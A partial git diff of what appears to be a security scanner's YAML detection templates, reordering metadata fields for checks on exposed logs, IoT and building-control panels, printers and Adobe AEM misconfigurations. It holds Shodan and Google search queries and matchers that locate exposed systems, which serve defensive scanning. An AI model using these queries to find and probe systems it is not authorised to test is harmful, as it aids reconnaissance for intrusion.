+# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml
index 31e09ef9d5..8ae2dcbce2 100644
--- a/http/exposures/logs/opentsdb-status.yaml
+++ b/http/exposures/logs/opentsdb-status.yaml
@@ -7,16 +7,16 @@ info:
description: OpenTSDB stats exposed which is commonly used in monitoring and observability scenarios where tracking and analyzing the performance of systems, applications, and infrastructure over time is essential.
reference: |
http://opentsdb.net/
+ classification:
+ cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:407286339
- product: opentsdb
vendor: opentsdb
+ product: opentsdb
+ shodan-query: http.favicon.hash:407286339
tags: opentsdb,exposure,logs
- classification:
- cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml
index 6592454887..58b4be0dbe 100644
--- a/http/exposures/logs/redis-exception-error.yaml
+++ b/http/exposures/logs/redis-exception-error.yaml
@@ -7,16 +7,16 @@ info:
description: Redis exception connection error page detected.
reference:
- https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
+ classification:
+ cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"redis.exceptions.ConnectionError"
- product: redis
vendor: redis
+ product: redis
+ shodan-query: html:"redis.exceptions.ConnectionError"
tags: exposure,redis,logs
- classification:
- cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 500
-# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml
index 3dd56a4340..2b0b7d2a1c 100644
--- a/http/exposures/logs/ws-ftp-log.yaml
+++ b/http/exposures/logs/ws-ftp-log.yaml
@@ -5,16 +5,16 @@ info:
author: Hardik-Solanki
severity: low
description: WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.
+ classification:
+ cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: intitle:"Index of" ws_ftp.log
- product: ws_ftp
vendor: ipswitch
+ product: ws_ftp
+ google-query: intitle:"Index of" ws_ftp.log
tags: exposure,ftp,logs
- classification:
- cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml
index 389925dab4..b3da647f34 100644
--- a/http/exposures/logs/yii-error-page.yaml
+++ b/http/exposures/logs/yii-error-page.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: unknown
description: Yii (An application framework to handle and manage errors) error page detected.
+ classification:
+ cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"yii\base\ErrorException"
- product: yii
vendor: yii_software
+ product: yii
+ shodan-query: html:"yii\base\ErrorException"
tags: exposure,yii,logs
- classification:
- cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 500
-# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml
index 97d1c4515e..7810cf51ee 100644
--- a/http/exposures/tokens/jwk-json-leak.yaml
+++ b/http/exposures/tokens/jwk-json-leak.yaml
@@ -8,16 +8,16 @@ info:
Searches for JSON Web Key (JWK) file.
reference:
- https://portswigger.net/web-security/jwt/algorithm-confusion
- metadata:
- shodan-query: html:"jwks.json"
- verified: true
- max-request: 1
- product: jwt
- vendor: jwt_project
- tags: exposure,token,generic
-
classification:
cpe: cpe:2.3:a:jwt_project:jwt:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: jwt_project
+ product: jwt
+ shodan-query: html:"jwks.json"
+ tags: exposure,token,generic
+
http:
- method: GET
path:
@@ -29,6 +29,7 @@ http:
- "{{BaseURL}}/jwks"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -44,4 +45,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/grandstream-device-configuration.yaml b/http/iot/grandstream-device-configuration.yaml
index d090cc093c..30b88bc9c0 100644
--- a/http/iot/grandstream-device-configuration.yaml
+++ b/http/iot/grandstream-device-configuration.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: info
description: Exposed Grandstream device configuration page detected.
- metadata:
- max-request: 1
- shodan-query: http.title:"Grandstream Device Configuration"
- product: ht801_firmware
- vendor: grandstream
- tags: iot
-
classification:
cpe: cpe:2.3:o:grandstream:ht801_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: grandstream
+ product: ht801_firmware
+ shodan-query: http.title:"Grandstream Device Configuration"
+ tags: iot
+
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/honeywell-building-control.yaml b/http/iot/honeywell-building-control.yaml
index 8b471a982a..c1d24e9fd4 100644
--- a/http/iot/honeywell-building-control.yaml
+++ b/http/iot/honeywell-building-control.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: info
description: Honeywell Building control panel was detected.
- metadata:
- max-request: 1
- shodan-query: html:"Honeywell Building Control"
- product: alerton_ascent_control_module
- vendor: honeywell
- tags: panel,iot
-
classification:
cpe: cpe:2.3:h:honeywell:alerton_ascent_control_module:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: honeywell
+ product: alerton_ascent_control_module
+ shodan-query: html:"Honeywell Building Control"
+ tags: panel,iot
+
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml
index e71f28ba1e..442a319acd 100644
--- a/http/iot/hp-color-laserjet-detect.yaml
+++ b/http/iot/hp-color-laserjet-detect.yaml
@@ -8,17 +8,17 @@ info:
reference:
- http://www.hp.com/
- https://www.hp.com/us-en/shop/cv/printers
+ classification:
+ cpe: cpe:2.3:h:hp:color_laserjet_pro_mfp_m183_7kw56a:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
+ vendor: hp
+ product: color_laserjet_pro_mfp_m183_7kw56a
shodan-query: http.title:"HP Color LaserJet"
google-query: intitle:"HP Color LaserJet"
- product: color_laserjet_pro_mfp_m183_7kw56a
- vendor: hp
tags: iot,hp
- classification:
- cpe: cpe:2.3:h:hp:color_laserjet_pro_mfp_m183_7kw56a:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -49,4 +49,5 @@ http:
group: 1
regex:
- 'HP Color LaserJet (.+)<\/h1><\/td>'
-# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/hue-personal-wireless-panel.yaml b/http/iot/hue-personal-wireless-panel.yaml
index 428132b177..3b53b4d6c9 100644
--- a/http/iot/hue-personal-wireless-panel.yaml
+++ b/http/iot/hue-personal-wireless-panel.yaml
@@ -5,15 +5,15 @@ info:
author: Hardik-Solanki
severity: info
description: HUE personal wireless lighting panel was detected.
- metadata:
- max-request: 1
- shodan-query: title:"hue personal wireless lighting"
- product: hue
- vendor: philips
- tags: hue,iot,wireless
-
classification:
cpe: cpe:2.3:h:philips:hue:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: philips
+ product: hue
+ shodan-query: title:"hue personal wireless lighting"
+ tags: hue,iot,wireless
+
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml
index a5d061a20c..b52e65127c 100644
--- a/http/iot/loytec-device.yaml
+++ b/http/iot/loytec-device.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: info
description: Loytec Device info panel was detected.
+ classification:
+ cpe: cpe:2.3:h:loytec:lvis-3me:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "loytec"
- product: lvis-3me
vendor: loytec
+ product: lvis-3me
+ shodan-query: "loytec"
tags: iot,loytec
- classification:
- cpe: cpe:2.3:h:loytec:lvis-3me:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml
index 745b872c91..3ad068096c 100644
--- a/http/iot/zebra-printer-detect.yaml
+++ b/http/iot/zebra-printer-detect.yaml
@@ -7,16 +7,16 @@ info:
description: Zebra Printer panel was detected.
reference:
- https://www.zebra.com/kr/ko/products/printers.html
+ classification:
+ cpe: cpe:2.3:o:zebra:zt220_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Zebra Technologies"
- product: zt220_firmware
vendor: zebra
+ product: zt220_firmware
+ shodan-query: html:"Zebra Technologies"
tags: iot,zebra,printer
- classification:
- cpe: cpe:2.3:o:zebra:zt220_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml
index f976c6fdc1..50ce38f689 100644
--- a/http/miscellaneous/exposed-file-upload-form.yaml
+++ b/http/miscellaneous/exposed-file-upload-form.yaml
@@ -4,16 +4,16 @@ info:
name: Exposed File Upload Form
author: geeknik
severity: info
+ classification:
+ cpe: cpe:2.3:a:creativedream_file_uploader_project:creativedream_file_uploader:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"multipart/form-data" html:"file"
- product: creativedream_file_uploader
vendor: creativedream_file_uploader_project
+ product: creativedream_file_uploader
+ shodan-query: http.html:"multipart/form-data" html:"file"
tags: miscellaneous,exposure,upload,form,misc,generic
- classification:
- cpe: cpe:2.3:a:creativedream_file_uploader_project:creativedream_file_uploader:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- "type=[\"'](file)[\"']"
- 'id="file"'
condition: or
-# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml
index 219bd6ffb4..43385d512c 100644
--- a/http/miscellaneous/microsoft-azure-error.yaml
+++ b/http/miscellaneous/microsoft-azure-error.yaml
@@ -4,15 +4,15 @@ info:
name: Microsoft Azure Web App - Error 404
author: dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: title:"Microsoft Azure Web App - Error 404"
- product: azure_app_service_on_azure_stack
- vendor: microsoft
- tags: error,azure,microsoft,misc,takeover,miscellaneous
-
classification:
cpe: cpe:2.3:a:microsoft:azure_app_service_on_azure_stack:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microsoft
+ product: azure_app_service_on_azure_stack
+ shodan-query: title:"Microsoft Azure Web App - Error 404"
+ tags: error,azure,microsoft,misc,takeover,miscellaneous
+
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 404
-# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml
index f6460f2500..c2f8e9efb0 100644
--- a/http/miscellaneous/netflix-conductor-version.yaml
+++ b/http/miscellaneous/netflix-conductor-version.yaml
@@ -8,15 +8,15 @@ info:
reference:
- https://github.com/Netflix/conductor/blob/v1.6.0-rc1/ui/src/server.js#L17
- https://github.com/Netflix/conductor/blob/v3.1.0/rest/src/main/java/com/netflix/conductor/rest/controllers/AdminResource.java#L42
- metadata:
- max-request: 2
- shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
- product: conductor
- vendor: netflix
- tags: miscellaneous,tech,netflix,conductor,api,misc
-
classification:
cpe: cpe:2.3:a:netflix:conductor:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: netflix
+ product: conductor
+ shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
+ tags: miscellaneous,tech,netflix,conductor,api,misc
+
http:
- method: GET
path:
@@ -48,4 +48,5 @@ http:
regex:
- 'conductor\-server\-([0-9.]+)\-'
- '"version":"([0-9.]+)\-'
-# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-acs-common.yaml b/http/misconfiguration/aem/aem-acs-common.yaml
index 0d4e51268d..26a876c00c 100644
--- a/http/misconfiguration/aem/aem-acs-common.yaml
+++ b/http/misconfiguration/aem/aem-acs-common.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM ACS Common pages exposed.
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 4
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- 'JCR Compare | ACS AEM Commons '
- 'Workflow Remover | ACS AEM Commons '
condition: or
-# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml
index 24eafb96c2..f8602b4d62 100644
--- a/http/misconfiguration/aem/aem-bg-servlet.yaml
+++ b/http/misconfiguration/aem/aem-bg-servlet.yaml
@@ -6,15 +6,15 @@ info:
severity: info
reference:
- https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
words:
- '
Flushing output
'
-# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-bulkeditor.yaml b/http/misconfiguration/aem/aem-bulkeditor.yaml
index 0b50187c9c..5c6eafc655 100644
--- a/http/misconfiguration/aem/aem-bulkeditor.yaml
+++ b/http/misconfiguration/aem/aem-bulkeditor.yaml
@@ -6,17 +6,17 @@ info:
severity: unknown
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
+ vendor: adobe
+ product: experience_manager
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
tags: misconfig,aem,adobe,editor
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100a4edfea1099ebe53ebde4477ff8f5b52cea4088b16cf4b2c8e7d5e54328210da022100c56046c245be3b42415069cccbcd5f1e365e289d7455f3374d6734e94958c4de:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a4edfea1099ebe53ebde4477ff8f5b52cea4088b16cf4b2c8e7d5e54328210da022100c56046c245be3b42415069cccbcd5f1e365e289d7455f3374d6734e94958c4de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml
index 64ce05b2b7..bcdbb15f46 100644
--- a/http/misconfiguration/aem/aem-cached-pages.yaml
+++ b/http/misconfiguration/aem/aem-cached-pages.yaml
@@ -7,15 +7,15 @@ info:
description: Cached Pages on AEM can be Flushed.
reference:
- https://twitter.com/AEMSecurity/status/1244965623689609217
- metadata:
- max-request: 1
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,misconfig
+
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml
index 9f900ef0fe..9f7fbb8fc0 100644
--- a/http/misconfiguration/aem/aem-crx-bypass.yaml
+++ b/http/misconfiguration/aem/aem-crx-bypass.yaml
@@ -8,15 +8,15 @@ info:
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
- metadata:
- max-request: 2
- shodan-query: http.component:"Adobe Experience Manager"
- product: experience_manager
- vendor: adobe
- tags: aem,adobe,misconfig
-
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: adobe
+ product: experience_manager
+ shodan-query: http.component:"Adobe Experience Manager"
+ tags: aem,adobe,misconfig
+
http:
- raw:
- |
@@ -49,4 +49,4 @@ http:
status:
- 200
-# digest: 490a0046304402206a620fb735ebddf2d38e66617f652a1d1f980bfc98b77c0784066538fcc3193c022062a511eed56f5bd9e0eaf2f93bf17a079e6c673676cbae5e2d506e72a96f084c:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206a620fb735ebddf2d38e66617f652a1d1f980bfc98b77c0784066538fcc3193c022062a511eed56f5bd9e0eaf2f93bf17a079e6c673676cbae5e2d506e72a96f084c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml
index d9fbf75aa8..71c8e4cdf8 100644
--- a/http/misconfiguration/aem/aem-crx-namespace.yaml
+++ b/http/misconfiguration/aem/aem-crx-namespace.yaml
@@ -7,17 +7,17 @@ info:
description: Adobe AEM CRX Namespace Editor is exposed.
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
metadata:
max-request: 1
+ vendor: adobe
+ product: experience_manager_cloud_service
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: experience_manager_cloud_service
- vendor: adobe
tags: exposure,aem,adobe,misconfig
- classification:
- cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml
index b68be5856f..750e34cb16 100644
--- a/http/misconfiguration/aem/aem-crx-search.yaml
+++ b/http/misconfiguration/aem/aem-crx-search.yaml
@@ -6,17 +6,17 @@ info:
severity: unknown
reference:
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt
+ classification:
+ cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 3
+ vendor: adobe
+ product: acs_aem_commons
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
- product: acs_aem_commons
- vendor: adobe
tags: misconfig,aem,adobe,exposure
- classification:
- cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502210088c8587ec0e4ff18a371d4326689ad944b03512c460f57cdab28bc82917d9478022032adf77e1469f2305dc825a5da6cc6856228cda7c153f1ec96bbc8fd4689b246:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210088c8587ec0e4ff18a371d4326689ad944b03512c460f57cdab28bc82917d9478022032adf77e1469f2305dc825a5da6cc6856228cda7c153f1ec96bbc8fd4689b246:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/aem/aem-custom-script.yaml b/http/misconfiguration/aem/aem-custom-script.yaml
